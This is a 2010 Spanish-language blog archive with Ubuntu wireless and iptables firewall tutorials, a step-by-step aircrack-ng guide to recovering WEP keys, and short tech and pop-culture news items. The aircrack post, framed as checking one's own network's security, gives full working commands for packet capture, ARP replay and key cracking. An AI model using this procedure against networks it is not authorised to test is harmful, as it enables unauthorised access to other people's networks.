viernes, 23 de julio de 2010

Ubuntu: Gestión desde consola de redes Wireless

# iwconfig
Este comando muestra el estado de la config de la wireless.


# iwlist scan
Muestra una lista de redes disponibles lanzando un escaneo.



Para enlazar con la red por línea de comandos...

# ifconfig up
cambia el estado del interfaz a “conectado”.

# iwconfig ESSID nombre-essid
Lanza conexión a la essid que le digamos.

# iwconfig clave-de-red
Determina la conexión pasando la clave.
“s:” indica que vas a introducir cadena de caracteres.
“0x” indica que vas a introducir numeros hexadecimales.

# dhclient
Para solicitar dirección ip por dhcp.

sábado, 17 de julio de 2010

Ubuntu : Creando firewall personalizado con iptables...

Su configuración en si es bastante sencilla, es recomendable probar comando por comando en consola. De todas formas hay que crear un script para que se cargue con el arranque, ya que cada vez que se reinicia el sistema los cambios se pierden.

Probando comandos.

Abrir consola en Applications->accesories->terminal.
En consola todo lo que haremos será con el comando iptables, si no está instalado:
#sudo apt-get iptables
Pero hace años que se integró en los repositorios por defecto, lo mas seguro es que no haga falta.

Aceptamos conexiones entrantes activas en el momento. Es importante que el sistema esté limpio de intrusos en este momento. Hay que ser originales.
#sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT


Aceptamos conexiones ssh tcp por el puerto por defecto (22). Esto nos permitirá loguearnos de forma remota, en caso de necesitarlo.
#sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT

Aceptamos conexiones tcp por el puerto 80, es decir www.
#sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

Aceptamos todo el tráfico por el puerto loopbak (como un puerto espejo...) en posición primera de iptables.
recordemos que muchos programas utilizan la interfaz loopback para comunicarse con otras.

#iptables -I INPUT 1 -i lo -j ACCEPT

Bloqueamos todo el resto del tráfico.

#iptables -A INPUT -j DROP

Hasta ahora se puede trabajar con esto, para comprobar lo que se ha hecho hay que usar el siguiente comando:

root@laptop:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:www
DROP all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Puede ser necesario compartir la conexión en un futuro...

NAT/PAT

#sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ppp0 -j MASQUERADE

La orden anterior supone que su espacio de direcciones privadas es 192.168.0.0/16 y que el dispositivo que conecta con Internet es ppp0.
La sintaxis se descompone de la siguiente forma:
-t nat -- la regla es para ir a la tabla nat
-A POSTROUTING -- la regla es para añadir (-A) a la cadena POSTROUTING
-s 192.168.0.0/16 -- la regla se aplica al tráfico originado desde la dirección específica
-o ppp0 -- la regla se aplica al tráfico programado para ser enrutado a través del dispositivo de red especificado
-j MASQUERADE -- el tráfico que se ajuste a esta regla «saltará» («jump», -j) al destino MASQUERADE para ser manipulado como se describió anteriormente

Listado de filtros habilitados para el forwarding.

root@laptop:~# iptables -A FORWARD -s 192.168.0.0/16 -o ppp0 -j ACCEPT
root@laptop:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:www
DROP all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh

Chain FORWARD (policy ACCEPT)
target prot opt source destination
ACCEPT all -- 192.168.0.0/16 anywhere

Maquina ppp0 la anterior y las activas en el momento.

root@laptop:~# iptables -A FORWARD -d 192.168.0.0/16 -m state --state ESTABLISHED,RELATED -i ppp0 -j ACCEPT
root@laptop:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:www
DROP all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh

Chain FORWARD (policy ACCEPT)
target prot opt source destination

ACCEPT all -- 192.168.0.0/16 anywhere
ACCEPT all -- anywhere 192.168.0.0/16 state RELATED,ESTABLISHED

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Ahora para que todo el trabajo no se pierda al reiniciar, hay que crear un script con todos los comandos aplicados hasta el momento...

En un archivo de texto en blanco, abierto con el writer de openoffice, se añaden las siguientes lineas:

iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport ssh -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -I INPUT 1 -i lo -j ACCEPT
iptables -A INPUT -j DROP
sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ppp0 -j MASQUERADE
sudo iptables -A FORWARD -s 192.168.0.0/16 -o ppp0 -j ACCEPT
sudo iptables -A FORWARD -d 192.168.0.0/16 -m state --state ESTABLISHED,RELATED -i ppp0 -j ACCEPT

Guardar y cerrar. En consola se le aplica al archivo permiso de ejecución:
#chmod +x nombredelscript

Un apunte, para comprobar que no hay intrusos en el sistema, se puede hacer con el comando:

# chkrootkit -q

sábado, 3 de julio de 2010

Manual facil y sencillo de aircrack en redes WEP

Como comprobar la seguridad de nuestra red wireless y la robustez de nuestra clave con la sencilla aplicación AirCrack-ng, paso a paso.

Es muy sencillo conseguirla ya que se encuentra en los repositorios de Linux, así que instalando Ubuntu 10.04, conexión a internet y una tarjeta Wireless ya podemos ir tirando.

Primero nos logueamos como root:


david@laptop:~$ su -l
Password:
root@laptop:~#
----> y entramos en nuestra carpeta de documentos, luego veremos por qué.

root@laptop:~# cd /home/(miusuario)/Documents/direcotorioqueyoquiera

Si no tenemos habilitado el root podemos hacerlo de la siguiente manera:

david@laptop:~$ sudo passwd root
[sudo] password for david:
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

---->también deberemos entrar en la carpeta documentos.
root@laptop:~# cd /home/(miusuario)/Documents/directorioqueyoquiera


O poniendo “sudo” delante de TODOS los comandos que relato a continuación.

---->En este caso tendremos que hacer en command console (terminal)...
$cd directorioqueyoquiera

Despues descargamos el programa entrando en consola la siguiente línea.

#apt-get install aircrack-ng

Y ya está instalado, facil.

Este paquete incluye:

airodump-ng
airmon-ng
aircrack-ng
aireplay-ng

… entre otros... Pero para lo que muestro a continuación solo necesitaremos las que ya he citado. Comenzamos el mogollón.

Primero:
Averiguamos nuestra propia MAC con el comando ifconfig, así a secas.

root@laptop:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr (aqui te pone la MAC)
inet addr:192.168.1.35 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fxxxxxxxxxxxxxxxxxxxxxxxxx Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5171 errors:0 dropped:0 overruns:0 frame:0
TX packets:5543 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5279816 (5.2 MB) TX bytes:1056334 (1.0 MB)

Segundo:
Arrancamos la interfaz.

root@laptop:~# airmon-ng start wlan0

Es posible que dé algunos errores pero aún así contunaremos adelante.

Tercero:
Escaneamos en busca de nuestra red, con este comando nos mostrará todas las redes a su alcance, algunas incluso ocultas.

root@laptop:~# airodump-ng mon0


CH “número de canal” ][ Elapsed: 0 s ][ 2010-06-29 23:29

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


(MacPuntoAcceso) -88 240 0 9 54 . (tipoenc)(tipocifrado) (RED)



Ya tenemos algunos datos que vemos que se publican, la MAC, el tipo de cifrado y el nombre de la red. Además veremos dispositivos inalámbricos en el alcance de nuestra wifi y sus números de MAC.

Si queremos ver porque no hay que poner claves encriptación WEP, solo tenemos que seguir los siguientes pasos.



root@laptop:~#sudo airodump-ng -c (número de canal) -w (RED) mon0 7

Los datos que nos muestra a continuación son los mismos que anteriormente, pero hemos limitado el escaneo al canal (número de canal) y a la red (RED). Además estamos estableciendo un enlace a través del interfaz lógico mon0. Este enlace nos hará falta en los siguientes comandos.
Abrimos otra terminal sin cerrar la anterior y:

root@laptop:~#sudo aireplay-ng -3 -e (RED) -b (MacPuntoAcceso) -h (NuestraMac) mon0

Con este sencillo comando estamos capturando los paquetes ARP que se guardarán con la extensión “.cap”, en la carpeta /home/usuario/Documents/directorioqueyoquiera.

Por esto al principio dije que había que acceder a esta carpeta, porque este comando genera un “chorreo” de archivos cap, que para eliminarlos, digamos que sería incomodo y mejor que no estén mezclados con nuestros archivos personales. Pero continuemos.

Abrimos otra command console e introducimos:

#aireplay-ng -1 6000 -q 10 -o 1 -e (RED) -a (MacPuntoAcceso) -h (NuestraMac) mon0
Con esto realizamos el enlace solicitamos paquetes ARP al punto de acceso.

Y a esperar a que juntemos por lo menos 200000 ARP's para estar seguros.

Cuando terminemos detenemos los procesos con ctrl+c o cerrando directamente la consola y abrimos el directorio que hayamos definido antes.

#aircrack-ng *.cap

...

KEY FOUND! [ (un chorro de números alfanum que no interesan) ] (ASCII: (nuestra clave encriptada) )


Y ya está, así que siempre que creemos una red inalámbrica, mejor la configuramos con un tipo de encriptación WPA o WPA2. Lo cual, si lo que queremos hacer es crear una red ad-hoc inalámbrica es bastante dificil, pero eso ya lo veremos en el siguiente post.

sábado, 1 de mayo de 2010

descargar manual ubuntu 10.4 lucid lynx


click aquí Para acceder a la página donde se descarga el manual...

y click aquí Para descargar el manual, no hay version en castellano, solo en inglés.

miércoles, 21 de abril de 2010

Dan la noticia del nuevo prototipo de iPhone 4G, y ahora lo reclama apple.

La noticia que se creía solo un rumor la ha dado el blog de tecnología GIZMODO.ES. Parece que se ha liado parda ya que la propia Apple inc. ha reclamado la devolución del susodicho celular ya que “es de su propiedad” aunque NO AFIRMAN NI DESMIENTEN QUE SEA UN PROTOTIPO.

De todas formas hay notables diferencias con el iphone 3g que se encuentra actualmente en el mercado, como una cámara frontal, 2º micrófono y una leve diferencia de peso de 3 gramos.

Mas datos en la web del descubridor.

jueves, 15 de abril de 2010

Atentando contra la libertad de catedra, el REGLAMENTO ORGANICO DE CENTROS




Fuentes:
http://www.rojoynegro.info/2004/spip.php?article30015

http://www.abc.es/agencias/noticia.asp?noticia=345507

http://www.andaluciaeduca.com/actualidad/vernoticia.php?id=28800

http://www.ideal.es/almeria/v/20100328/el-ejido/profesores-contra-20100328.html

http://www.territoriodigital.com/nota2.aspx?c=7497611679012528

Buscando el efecto FAN... la Cyrus con Bisbal

No suelo implicarme con productos de marketing tan evidentes, pero los almerienses se merecen mi simpatía. Pocas provincias cuentan con unos ciudadanos tan majos.

¿Recuerda alguien lo de Jessica Simpson, que en pleno directo intentó igualar la ultrasónica voz del Bisbalín, con el inevitable desafine de la primera? Pues ahora la protagonista de Hanna Montana ha gravado un videoclip con el cantante almeriense. ¿Tendrá el valor de cantar en directo este tema con David en el futuro? Porque en directo, pero sin David, si que se ha atrevido en American Idol. Al tiempo...

martes, 12 de enero de 2010

Nuevas news: Spiderman 4 "Reboot", La ley Sinde se ha publicado.




Me entero por el blog de Uruloki y se confirma en deadline.com En palabras de Sam Raimi y Amy Pascal en una nota de prensa, van a "reiniciar Spiderman" con nuevo cast&crew (van a rodar cabezas) ya que quieren que el nuevo Spiderman (2012)trate de su vida en el colegio. ¿Hasta donde tiene que ver la adquisicion de Marvel por parte de Disney en todo esto?

Ley Sinde, opiniones.
Será el Gobierno quien decida qué sitios web cerrar . Libertad digital

La 'Ley Sinde' deja la puerta abierta al cierre de blogs que enlacen a webs de P2P. 20minutos.es

jueves, 7 de enero de 2010